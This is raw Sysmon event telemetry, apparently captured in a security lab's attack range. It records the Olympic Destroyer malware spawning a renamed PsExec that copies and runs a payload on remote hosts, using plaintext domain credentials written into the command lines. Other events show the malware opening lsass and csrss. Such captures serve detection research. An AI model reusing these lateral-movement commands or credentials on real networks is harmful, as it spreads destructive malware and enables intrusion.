dll.dll+51791 10341000x8000000000000000291902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.587{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.587{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.587{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.587{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12FD-6216-CE05-000000003802}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.572{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-CE05-000000003802}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.572{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12FD-6216-CE05-000000003802}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000291896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.436{C8EA50B7-12FD-6216-CE05-000000003802}6332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.556{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-D005-000000003802}7112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.555{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FD-6216-D005-000000003802}7112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.518{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.518{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.518{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.518{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.487{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.487{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.487{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.487{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.487{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.489{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.487{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FD-6216-CF05-000000003802}6360C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:01.471{C8EA50B7-12FD-6216-CB05-000000003802}6316C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.434{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.434{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.434{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.434{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.418{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.418{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.422{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:01.418{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12FD-6216-CD05-000000003802}4900C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 